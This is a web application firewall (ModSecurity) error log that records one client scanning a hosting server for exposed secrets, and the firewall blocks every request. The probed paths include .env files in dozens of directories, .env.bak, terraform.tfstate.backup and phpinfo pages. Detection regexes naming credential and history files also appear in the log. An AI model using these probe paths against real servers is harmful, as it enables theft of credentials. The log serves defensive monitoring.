[Tue May 26 13:17:31.434896 2026] [security2:error] [pid 501489:tid 501700] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/node/api/.env"] [unique_id "ahVQE2kFNZ9cRlz80IjSPQAAANU"]
[Tue May 26 13:17:31.437396 2026] [security2:error] [pid 501489:tid 501624] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/node/.env"] [unique_id "ahVQE2kFNZ9cRlz80IjSPgAAAIo"]
[Tue May 26 13:17:31.440697 2026] [security2:error] [pid 501489:tid 501750] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/node/backend/.env"] [unique_id "ahVQE2kFNZ9cRlz80IjSPwAAAQM"]
[Tue May 26 13:17:31.463462 2026] [security2:error] [pid 501489:tid 501634] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/nodeapi/.env"] [unique_id "ahVQE2kFNZ9cRlz80IjSQAAAAJQ"]
[Tue May 26 13:17:31.475213 2026] [security2:error] [pid 501489:tid 501669] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/nodeweb/.env"] [unique_id "ahVQE2kFNZ9cRlz80IjSQQAAALY"]
[Tue May 26 13:17:31.525747 2026] [security2:error] [pid 501489:tid 501654] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/media/.env"] [unique_id "ahVQE2kFNZ9cRlz80IjSSAAAAKc"]
[Tue May 26 13:17:31.538823 2026] [security2:error] [pid 501489:tid 501649] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/old/.env"] [unique_id "ahVQE2kFNZ9cRlz80IjSSQAAAKI"]
[Tue May 26 13:17:31.713136 2026] [security2:error] [pid 501489:tid 501742] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/opt/.env"] [unique_id "ahVQE2kFNZ9cRlz80IjSYwAAAPs"]
[Tue May 26 13:17:31.769449 2026] [security2:error] [pid 501489:tid 501666] [client 195.178.110.199:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/php-info.php"] [unique_id "ahVQE2kFNZ9cRlz80IjSaAAAALM"]
[Tue May 26 13:17:31.781574 2026] [security2:error] [pid 501489:tid 501728] [client 195.178.110.199:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/php.php"] [unique_id "ahVQE2kFNZ9cRlz80IjSaQAAAO8"]
[Tue May 26 13:17:31.793504 2026] [security2:error] [pid 501489:tid 501647] [client 195.178.110.199:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/php_info.php"] [unique_id "ahVQE2kFNZ9cRlz80IjSagAAAKA"]
[Tue May 26 13:17:31.806602 2026] [security2:error] [pid 501489:tid 501735] [client 195.178.110.199:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/phpinfo.php"] [unique_id "ahVQE2kFNZ9cRlz80IjSbAAAAPU"]
[Tue May 26 13:17:31.836050 2026] [security2:error] [pid 501489:tid 501701] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/portal/.env"] [unique_id "ahVQE2kFNZ9cRlz80IjSbgAAANY"]
[Tue May 26 13:17:31.871930 2026] [security2:error] [pid 501489:tid 501709] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/prod/.env"] [unique_id "ahVQE2kFNZ9cRlz80IjScQAAAN4"]
[Tue May 26 13:17:31.875437 2026] [security2:error] [pid 501489:tid 501632] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/product/.env"] [unique_id "ahVQE2kFNZ9cRlz80IjScgAAAJI"]
[Tue May 26 13:17:31.885694 2026] [security2:error] [pid 501489:tid 501733] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/production/.env"] [unique_id "ahVQE2kFNZ9cRlz80IjScwAAAPM"]
[Tue May 26 13:17:31.940182 2026] [security2:error] [pid 501489:tid 501650] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/public-api/.env"] [unique_id "ahVQE2kFNZ9cRlz80IjSeQAAAKM"]
[Tue May 26 13:17:31.996229 2026] [security2:error] [pid 501489:tid 501713] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/public_html/.env"] [unique_id "ahVQE2kFNZ9cRlz80IjSgAAAAOI"]
[Tue May 26 13:17:32.010733 2026] [security2:error] [pid 501489:tid 501640] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/qa/.env"] [unique_id "ahVQFGkFNZ9cRlz80IjSgQAAAJo"]
[Tue May 26 13:17:32.072978 2026] [security2:error] [pid 501489:tid 501679] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/project/.env"] [unique_id "ahVQFGkFNZ9cRlz80IjShwAAAMA"]
[Tue May 26 13:17:32.102389 2026] [security2:error] [pid 501489:tid 501716] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/public/.env"] [unique_id "ahVQFGkFNZ9cRlz80IjSigAAAOU"]
[Tue May 26 13:17:32.122343 2026] [security2:error] [pid 501489:tid 501620] [client 195.178.110.199:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/public/phpinfo.php"] [unique_id "ahVQFGkFNZ9cRlz80IjSjQAAAIY"]
[Tue May 26 13:17:32.419505 2026] [security2:error] [pid 501489:tid 501658] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/s3/.env.bak"] [unique_id "ahVQFGkFNZ9cRlz80IjSrAAAAKs"]
[Tue May 26 13:17:32.528241 2026] [security2:error] [pid 501489:tid 501701] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/server/.env"] [unique_id "ahVQFGkFNZ9cRlz80IjStgAAANY"]
[Tue May 26 13:17:32.536765 2026] [security2:error] [pid 501489:tid 501699] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/server/api/.env"] [unique_id "ahVQFGkFNZ9cRlz80IjStwAAANQ"]
[Tue May 26 13:17:32.568211 2026] [security2:error] [pid 501489:tid 501632] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/server/backend/.env"] [unique_id "ahVQFGkFNZ9cRlz80IjSuQAAAJI"]
[Tue May 26 13:17:33.047109 2026] [security2:error] [pid 501489:tid 501734] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQFGkFNZ9cRlz80IjSwgAAAPQ"]
[Tue May 26 13:17:33.812402 2026] [security2:error] [pid 501489:tid 501698] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/shared/.env"] [unique_id "ahVQFWkFNZ9cRlz80IjS6QAAANM"]
[Tue May 26 13:17:33.815830 2026] [security2:error] [pid 501489:tid 501660] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/shop/.env"] [unique_id "ahVQFWkFNZ9cRlz80IjS6gAAAK0"]
[Tue May 26 13:17:33.836159 2026] [security2:error] [pid 501489:tid 501648] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/service/.env"] [unique_id "ahVQFWkFNZ9cRlz80IjS7gAAAKE"]
[Tue May 26 13:17:33.849428 2026] [security2:error] [pid 501489:tid 501627] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/services/.env"] [unique_id "ahVQFWkFNZ9cRlz80IjS8AAAAI0"]
[Tue May 26 13:17:33.975592 2026] [security2:error] [pid 501489:tid 501665] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/src/.env"] [unique_id "ahVQFWkFNZ9cRlz80IjS-wAAALI"]
[Tue May 26 13:17:34.102963 2026] [security2:error] [pid 501489:tid 501749] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/srv/.env"] [unique_id "ahVQFmkFNZ9cRlz80IjS_wAAAQI"]
[Tue May 26 13:17:34.111853 2026] [security2:error] [pid 501489:tid 501649] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/stage/.env"] [unique_id "ahVQFmkFNZ9cRlz80IjTAAAAAKI"]
[Tue May 26 13:17:34.131502 2026] [security2:error] [pid 501489:tid 501696] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/staging/.env"] [unique_id "ahVQFmkFNZ9cRlz80IjTAQAAANE"]
[Tue May 26 13:17:34.202364 2026] [security2:error] [pid 501489:tid 501707] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/stg/.env"] [unique_id "ahVQFmkFNZ9cRlz80IjTDQAAANw"]
[Tue May 26 13:17:34.335114 2026] [security2:error] [pid 501489:tid 501694] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/stripe/.env"] [unique_id "ahVQFmkFNZ9cRlz80IjTHwAAAM8"]
[Tue May 26 13:17:34.437767 2026] [security2:error] [pid 501489:tid 501743] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/terraform.tfstate.backup"] [unique_id "ahVQFmkFNZ9cRlz80IjTKQAAAPw"]
[Tue May 26 13:17:34.484072 2026] [security2:error] [pid 501489:tid 501737] [client 195.178.110.199:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/test.php"] [unique_id "ahVQFmkFNZ9cRlz80IjTLgAAAPY"]
[Tue May 26 13:17:34.493609 2026] [security2:error] [pid 501489:tid 501642] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/test/.env"] [unique_id "ahVQFmkFNZ9cRlz80IjTLwAAAJw"]
